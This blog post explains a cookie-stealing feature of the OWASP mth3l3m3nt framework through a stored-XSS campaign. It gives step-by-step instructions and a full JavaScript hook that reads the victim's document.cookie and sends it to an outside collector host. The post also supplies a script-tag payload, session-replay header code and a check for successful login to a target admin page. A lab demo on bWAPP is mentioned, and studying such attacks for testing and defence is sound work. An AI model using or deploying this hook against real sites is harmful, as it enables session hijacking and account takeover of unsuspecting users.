It’s been a while since my last “confession”. So today I’m here to tell you that sadly “I placed my hand in the cookie jar”. Pfffffffft!!!!!
There’s a nifty new feature in the OWASP mth3l3m3nt framework that you just might love. It was inspired by pentest tools and aims to give potency to Cross Site Scripting attacks. Basically, here is how it works.
Stored XSS Scenario.
- Visit a site and identify a stored XSS vulnerability.
- Identify a page you would love to test access to, e.g. http://victim.com/admin/index.php
- Go back to your mth3l3m3nt framework and, in the CTDB tab, create a campaign.
- Feed it the page you would love to test access to. This determines whether the captured cookie can be used to access that page: the page will be downloaded for you, so that when you view the HTML you can tell whether the cookie got you into the page or not.
- Once you create a campaign, you will get a link to your hooking script. A simple example will be provided, but feel free to hook your script differently; it will still work.
- Wait for the target to visit the page. The information will be sent back to you and stored in your DB, and the pages that you targeted will also be downloaded to your server.
- Open your browser and load the target site, replace the cookie you have with the one you got in your DB, then try to access the target page. If successful, you’re welcome.
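The moving parts of that campaign, as an added example in plain JavaScript (this is not mth3l3m3nt’s own hooking script; the collector URL, the query parameter names and the sample cookies are made up): the browser-side hook that a stored XSS payload would load, and the collector-side helpers for turning the captured cookie back into a request header and judging the downloaded target page.

```javascript
// Added example, not code from mth3l3m3nt. The collector URL and parameter
// names are assumptions; the sample cookie values are constructed.
const COLLECTOR_URL = "https://collector.example/ctdb/hook"; // hypothetical

// Parse a document.cookie-style string ("a=1; b=2") into an object.
// Cookies flagged HttpOnly never appear in document.cookie, so they cannot
// show up here: that is exactly the HttpOnly limitation of this technique.
function parseCookieString(cookieString) {
  const out = {};
  for (const part of cookieString.split(";")) {
    const trimmed = part.trim();
    if (!trimmed) continue;
    const eq = trimmed.indexOf("=");
    const name = eq === -1 ? trimmed : trimmed.slice(0, eq);
    const value = eq === -1 ? "" : trimmed.slice(eq + 1);
    out[name] = value;
  }
  return out;
}

// Build the beacon URL that carries the cookies and the page they came from.
function buildBeaconUrl(collector, cookieString, pageUrl) {
  const u = new URL(collector);
  u.searchParams.set("cookie", cookieString);
  u.searchParams.set("page", pageUrl);
  return u.toString();
}

// The hook itself. It runs inside the victim's browser on the vulnerable
// origin, so document.cookie is the victim's cookie jar for that site.
// An image beacon is used because a plain GET for an image is allowed
// cross-origin, so the data reaches a collector on another domain; the
// response is not readable from the page, but nothing needs to be read.
function hook(doc, win, collector = COLLECTOR_URL) {
  const url = buildBeaconUrl(collector, doc.cookie, win.location.href);
  const img = new win.Image();
  img.src = url;
  return url;
}

// Collector side: rebuild a Cookie request header from the stored cookies so
// the target page can be fetched with the victim's session (the replay step).
function toCookieHeader(cookies) {
  return Object.entries(cookies)
    .map(([name, value]) => `${name}=${value}`)
    .join("; ");
}

// Crude check on the downloaded target page: if the HTML still carries a
// password field, the stolen cookie did not get us past the login.
function looksLoggedIn(html) {
  return !html.toLowerCase().includes('type="password"');
}

// Constructed sample run (no browser needed): a fake document and window
// stand in for the victim's page.
function demo() {
  const fakeDocument = { cookie: "PHPSESSID=abc123; security_level=0" };
  const fakeWindow = {
    location: { href: "http://victim.com/portal.php" },
    Image: function () { this.src = ""; },
  };
  const beacon = hook(fakeDocument, fakeWindow);
  const replayHeader = toCookieHeader(parseCookieString(fakeDocument.cookie));
  return { beacon, replayHeader };
}
```

In a real campaign the stored payload is just a script tag pointing at the hook (e.g. `<script src="https://collector.example/hook.js"></script>`, hypothetical URL) and the hook file ends with `hook(document, window)`. The beacon is deliberately a GET with the data in the query string: that is what lets it cross origins, and it is also why a server-side fetch with the rebuilt Cookie header, rather than the victim's browser, is what retrieves the target page.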
Limitations:
- Reflected XSS would need you to bind the script to an existing page and, for instance, mail the link to the user. Feel free to bind it to a blank page too; it still works, since it executes on load. However, this becomes tricky for target pages because cookies are scoped to the target’s domain and the browser’s same-origin policy stops a script on another origin from reading them.
- You won’t be able to get cookies that have been marked as HttpOnly, because the browser never exposes those to document.cookie.
I have done a demo using bWAPP, which is a really good application developed by Malik Mesellem, and shown how to increase the potency of the attack beyond an alert box by actually stealing a user’s session. Watch it below:
Confession Complete!!